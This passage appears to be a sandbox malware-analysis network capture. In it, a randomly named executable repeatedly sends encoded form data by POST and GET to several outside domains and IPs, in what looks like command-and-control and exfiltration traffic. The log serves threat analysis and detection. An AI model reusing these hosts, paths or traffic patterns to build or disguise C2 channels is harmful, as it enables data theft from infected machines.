                                                                                                        16 | 192.168.2.6 | 49968 | 209.74.64.187 | 80 | 2488 | C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        Dec 2, 2024 14:38:41.615027905 CET | 549 | OUT | GET /ohf8/?aNXP_jw=ll5dDbshsmxjCV2KoC1RTtNOe9IddMOnmIejqeX5AC+cgPBA3oVXvxxUo0hOqHqzs3EuIGVBpbOb4OwgMNYqC7Yr6zshBBR6fmx5Fk8+3pxn0VniOhKvc7yUqYSWiUeq1UgZ2CQ=&cTT8u=Q4NHoHJ0 HTTP/1.1
                                                                                                        Host: www.jagdud.store
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Connection: close
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                        Dec 2, 2024 14:38:42.952363014 CET | 548 | IN | HTTP/1.1 404 Not Found
                                                                                                        Date: Mon, 02 Dec 2024 13:38:42 GMT
                                                                                                        Server: Apache
                                                                                                        Content-Length: 389
                                                                                                        Connection: close
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                        17 | 192.168.2.6 | 49985 | 3.33.130.190 | 80 | 2488 | C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        Dec 2, 2024 14:38:48.700900078 CET | 816 | OUT | POST /gofy/ HTTP/1.1
                                                                                                        Host: www.wiretap.digital
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Origin: http://www.wiretap.digital
                                                                                                        Referer: http://www.wiretap.digital/gofy/
                                                                                                        Content-Length: 212
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Cache-Control: max-age=0
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                        18 | 192.168.2.6 | 49992 | 3.33.130.190 | 80 | 2488 | C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        Dec 2, 2024 14:38:51.373893023 CET | 840 | OUT | POST /gofy/ HTTP/1.1
                                                                                                        Host: www.wiretap.digital
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Origin: http://www.wiretap.digital
                                                                                                        Referer: http://www.wiretap.digital/gofy/
                                                                                                        Content-Length: 236
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Cache-Control: max-age=0
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                        Data Ascii: aNXP_jw=3RgQnu0q1W9Ph3/QeFnaNwWxnIYjvnGBrhOPqxguPAqvy7oZeBnEmkds8znAFk9e0p7hcQ44ZLOoj2oneVunf3mTjY+5koHebw+SzB8HCAVlyJ0QgONRD+S7SCkENm7pOnoL/tD7N/C9nb8VO2SbOICG5Piu2zrMNcQLUr28PMIPPO82ATO460ao2D7Fes9j6aaPuq0O2GFBR1u1yEdscgxciIF6vxJf7A==


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                        19 | 192.168.2.6 | 49999 | 3.33.130.190 | 80 | 2488 | C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        Dec 2, 2024 14:38:54.039807081 CET | 1853 | OUT | POST /gofy/ HTTP/1.1
                                                                                                        Host: www.wiretap.digital
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Origin: http://www.wiretap.digital
                                                                                                        Referer: http://www.wiretap.digital/gofy/
                                                                                                        Content-Length: 1248
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Cache-Control: max-age=0
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                        Data Ascii: aNXP_jw= [TRUNCATED]


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                        20 | 192.168.2.6 | 50005 | 3.33.130.190 | 80 | 2488 | C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        Dec 2, 2024 14:38:56.692955017 CET | 552 | OUT | GET /gofy/?cTT8u=Q4NHoHJ0&aNXP_jw=6TIwkaMK82JU2lT4P2bgJiPAvIc6jXqd+j7u+3hJGjnGpfQiXQPwlx1SylvkGzRUjN/XVyFZdd3ZrGt0Ry6iVQqerNi8ibzmajOWyGUvPjo8vNYMiNR/EtvLRStZKR6xKR5Vua8= HTTP/1.1
                                                                                                        Host: www.wiretap.digital
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Connection: close
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                        Dec 2, 2024 14:38:57.778453112 CET | 414 | IN | HTTP/1.1 200 OK
                                                                                                        Server: openresty
                                                                                                        Date: Mon, 02 Dec 2024 13:38:57 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 274
                                                                                                        Connection: close
                                                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?cTT8u=Q4NHoHJ0&aNXP_jw=6TIwkaMK82JU2lT4P2bgJiPAvIc6jXqd+j7u+3hJGjnGpfQiXQPwlx1SylvkGzRUjN/XVyFZdd3ZrGt0Ry6iVQqerNi8ibzmajOWyGUvPjo8vNYMiNR/EtvLRStZKR6xKR5Vua8="}</script></head></html>


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                        21 | 192.168.2.6 | 50011 | 3.33.130.190 | 80 | 2488 | C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        Dec 2, 2024 14:39:03.596259117 CET | 801 | OUT | POST /5l50/ HTTP/1.1
                                                                                                        Host: www.it2sp8.vip
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Origin: http://www.it2sp8.vip
                                                                                                        Referer: http://www.it2sp8.vip/5l50/
                                                                                                        Content-Length: 212
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Cache-Control: max-age=0
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                        Data Ascii: aNXP_jw=mME0ZX0cZGtulAt8yC/dXULdG86/WlL3s+sW4YxfSzrXVCNLcMRrRkZzvxbTVBpy41D+tfto9ndcMttxW2zkfwAgguSDD8+mcVYq92LsfmE6aGYS4OJNml7aXrAyKeectg9IfW+YX8kIYrJSHWKL4DV5tAZea8xby4Bi/L4Uqd0MH+T/Qt3A1G//QvN8ty47J+jSAm7bQpo6


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                        22 | 192.168.2.6 | 50012 | 3.33.130.190 | 80 | 2488 | C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        Dec 2, 2024 14:39:06.280425072 CET | 825 | OUT | POST /5l50/ HTTP/1.1
                                                                                                        Host: www.it2sp8.vip
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Origin: http://www.it2sp8.vip
                                                                                                        Referer: http://www.it2sp8.vip/5l50/
                                                                                                        Content-Length: 236
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Cache-Control: max-age=0
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                        Data Ascii: aNXP_jw=mME0ZX0cZGtukgd8xhXdQ0LaYM6/P1K8s+gW4ZkESBPXVjdLfIFrSkZzgRbWIxof41+DteRo9nJcMppxKRnjZgAu1+SBMc+mcVYq9yrCfiQ6aykS5vJOsF7VeLAybueYtg9qfUKyX/QIYpRSHHKIzDV/ggYCbtYz7rth3aMe+9EJCIOlMe3jnWf9QtVOtS4RL+bSSx38fdNZZer7crUeFVRdkIVE3TllEw==


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                        23 | 192.168.2.6 | 50013 | 3.33.130.190 | 80 | 2488 | C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        Dec 2, 2024 14:39:08.950103045 CET | 1838 | OUT | POST /5l50/ HTTP/1.1
                                                                                                        Host: www.it2sp8.vip
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Origin: http://www.it2sp8.vip
                                                                                                        Referer: http://www.it2sp8.vip/5l50/
                                                                                                        Content-Length: 1248
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Cache-Control: max-age=0
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                        Data Ascii: aNXP_jw= [TRUNCATED]


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                        24 | 192.168.2.6 | 50014 | 3.33.130.190 | 80 | 2488 | C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        Dec 2, 2024 14:39:11.615056992 CET | 547 | OUT | GET /5l50/?aNXP_jw=rOsUan8VbFhNvxYE9hHVSSa/SbzRVnORxP9GyZA7SRPLTVt8SKFFaQAsgVzmVwIzjQiAicxO7WRfOIhRPBniTm4i15yEbcTUEwFf3HznLV4DES1syv5vrWOVY80sCIfmhGQOLBk=&cTT8u=Q4NHoHJ0 HTTP/1.1
                                                                                                        Host: www.it2sp8.vip
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Connection: close
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                        Dec 2, 2024 14:39:12.751909971 CET | 414 | IN | HTTP/1.1 200 OK
                                                                                                        Server: openresty
                                                                                                        Date: Mon, 02 Dec 2024 13:39:12 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 274
                                                                                                        Connection: close
                                                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?aNXP_jw=rOsUan8VbFhNvxYE9hHVSSa/SbzRVnORxP9GyZA7SRPLTVt8SKFFaQAsgVzmVwIzjQiAicxO7WRfOIhRPBniTm4i15yEbcTUEwFf3HznLV4DES1syv5vrWOVY80sCIfmhGQOLBk=&cTT8u=Q4NHoHJ0"}</script></head></html>


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                        25 | 192.168.2.6 | 50015 | 3.33.130.190 | 80 | 2488 | C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        Dec 2, 2024 14:39:18.561003923 CET | 819 | OUT | POST /cvmn/ HTTP/1.1
                                                                                                        Host: www.cbprecise.online
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Origin: http://www.cbprecise.online
                                                                                                        Referer: http://www.cbprecise.online/cvmn/
                                                                                                        Content-Length: 212
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Cache-Control: max-age=0
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                        Data Ascii: aNXP_jw=pRevWou4FjqmLIyADWyCXou/61Rre5c+m+/mbcNf/X2GAduruLOViqUpD04IUQuRM8pvVkb8i4jHYGvv/Xqd8cW7UdQqRgv4NK+MQ0OgbhEZG+RqeAte4ZSx0gXUw6rOgKDh90o5U/qpSxy6b6kWkvupNpDIqYQPX6A3CaNWk9AxopC8l2mLfY4JgmF+0/zWMsttF7dTEUa6


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                        26 | 192.168.2.6 | 50017 | 3.33.130.190 | 80 | 2488 | C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        Dec 2, 2024 14:39:21.231775045 CET | 843 | OUT | POST /cvmn/ HTTP/1.1
                                                                                                        Host: www.cbprecise.online
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Origin: http://www.cbprecise.online
                                                                                                        Referer: http://www.cbprecise.online/cvmn/
                                                                                                        Content-Length: 236
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Cache-Control: max-age=0
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                        Data Ascii: aNXP_jw=pRevWou4FjqmIoiACxmCRIu++FRrUZc6m+zmbZ1P+lSGB/2rvOiVjqUpWE4HbwuOM8lNVkX8i4nHYHfv/kyau8W9b9QsOwv4NK+MQ0qZbhcZGPhqMxtf7ZS2+AXU7arKgKC2910fU8epSza6VPQV9fuvJpCnsadwZbxdF5ww6aIJg/fm5FmoNIYLgkdM0fz8OsVtXsR0Lg/Z1ijgHS7yfSuIGbcui+x54g==


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                        27 | 192.168.2.6 | 50018 | 3.33.130.190 | 80 | 2488 | C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        Dec 2, 2024 14:39:23.902400970 CET | 1856 | OUT | POST /cvmn/ HTTP/1.1
                                                                                                        Host: www.cbprecise.online
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Origin: http://www.cbprecise.online
                                                                                                        Referer: http://www.cbprecise.online/cvmn/
                                                                                                        Content-Length: 1248
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Cache-Control: max-age=0
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                        Data Ascii: aNXP_jw= [TRUNCATED]


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                        28 | 192.168.2.6 | 50019 | 3.33.130.190 | 80 | 2488 | C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        Dec 2, 2024 14:39:26.573471069 CET | 553 | OUT | GET /cvmn/?cTT8u=Q4NHoHJ0&aNXP_jw=kT2PVcuYPhCIcYe2L3yhSZm/01N2YaEp7Mi6RbxY9XuRZq3jntXnn9h0Tz9dUD6RU59Ud1zluKO0dVzp+S+roKiKfYRZRlDdOZb7PAuefTsxfeJpJgY665Liw0ad36KrhrX4mzY= HTTP/1.1
                                                                                                        Host: www.cbprecise.online
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Connection: close
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                        Dec 2, 2024 14:39:27.662194014 CET | 414 | IN | HTTP/1.1 200 OK
                                                                                                        Server: openresty
                                                                                                        Date: Mon, 02 Dec 2024 13:39:27 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 274
                                                                                                        Connection: close
                                                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?cTT8u=Q4NHoHJ0&aNXP_jw=kT2PVcuYPhCIcYe2L3yhSZm/01N2YaEp7Mi6RbxY9XuRZq3jntXnn9h0Tz9dUD6RU59Ud1zluKO0dVzp+S+roKiKfYRZRlDdOZb7PAuefTsxfeJpJgY665Liw0ad36KrhrX4mzY="}</script></head></html>


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                        29 | 192.168.2.6 | 50020 | 47.238.157.253 | 80 | 2488 | C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        Dec 2, 2024 14:39:34.032985926 CET | 804 | OUT | POST /tjfd/ HTTP/1.1
                                                                                                        Host: www.yun08ps.top
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Origin: http://www.yun08ps.top
                                                                                                        Referer: http://www.yun08ps.top/tjfd/
                                                                                                        Content-Length: 212
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Cache-Control: max-age=0
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                        Data Ascii: aNXP_jw=sWdcaPfzev/tiz4FU/Bz5cw0T3873eg1+c9n/p+R2mWHeaSadn9EPb2LeYc8X/eoKxkIJ6x/dN7ASSQoSg1lo3geiEJUzMKWnEDZaayhpVKgkTLe7VfnHt5IgoI9MSezwqyScwf/VbfIlzodntgbX4yWjK/ZOT1kpNCIG52xCaBA66jdy8iC7qGMtsP1VGALfcHHyGtkSYw9


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                        30 | 192.168.2.6 | 50021 | 47.238.157.253 | 80 | 2488 | C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        Dec 2, 2024 14:39:36.699934006 CET | 828 | OUT | POST /tjfd/ HTTP/1.1
                                                                                                        Host: www.yun08ps.top
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Origin: http://www.yun08ps.top
                                                                                                        Referer: http://www.yun08ps.top/tjfd/
                                                                                                        Content-Length: 236
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Cache-Control: max-age=0
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                        Data Ascii: aNXP_jw=sWdcaPfzev/ttwgFWY9z+8w3PH87hug5+c5n/oqB3QmHf6CaHlZEOb2LU4d0KPeZKx4fJ7d/dNHASWcoRR1mungc3UJSu8KWnEDZaa2bpVyglj7e0UfgNN5Jw4I9bCf6wqzxc1/VVY3Il3sdn4cYAIyQtq/MHgw+ourNZbiWZoNT2s+HuPihp6mOtuXHVmAhdc/HgRhDdsVehkaaF+WUDWkpghu76uYNAQ==


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                        31 | 192.168.2.6 | 50022 | 47.238.157.253 | 80 | 2488 | C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        Dec 2, 2024 14:39:39.370096922 CET | 1841 | OUT | POST /tjfd/ HTTP/1.1
                                                                                                        Host: www.yun08ps.top
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Origin: http://www.yun08ps.top
                                                                                                        Referer: http://www.yun08ps.top/tjfd/
                                                                                                        Content-Length: 1248
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Cache-Control: max-age=0
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                        Data Ascii: aNXP_jw= [TRUNCATED]


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                        32 | 192.168.2.6 | 50023 | 47.238.157.253 | 80 | 2488 | C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        Dec 2, 2024 14:39:42.045149088 CET | 548 | OUT | GET /tjfd/?aNXP_jw=hU18Z//aae7PuBg9apJb96loanMP5/1Vub46+YuE1RepJ+epEltxKOfVY+omXPiOW2IODI1uSb7TTTd0R0t6khQdikIhy+mltUDrCuC1oSKa8QDC2XrbIZdN6oN7Umup+JrtMVA=&cTT8u=Q4NHoHJ0 HTTP/1.1
                                                                                                        Host: www.yun08ps.top
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Connection: close
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                        33 | 192.168.2.6 | 50025 | 67.223.117.169 | 80 | 2488 | C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        Dec 2, 2024 14:40:09.588248014 CET | 819 | OUT | POST /mbcs/ HTTP/1.1
                                                                                                        Host: www.rtpsilva4d.click
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Origin: http://www.rtpsilva4d.click
                                                                                                        Referer: http://www.rtpsilva4d.click/mbcs/
                                                                                                        Content-Length: 212
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Cache-Control: max-age=0
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
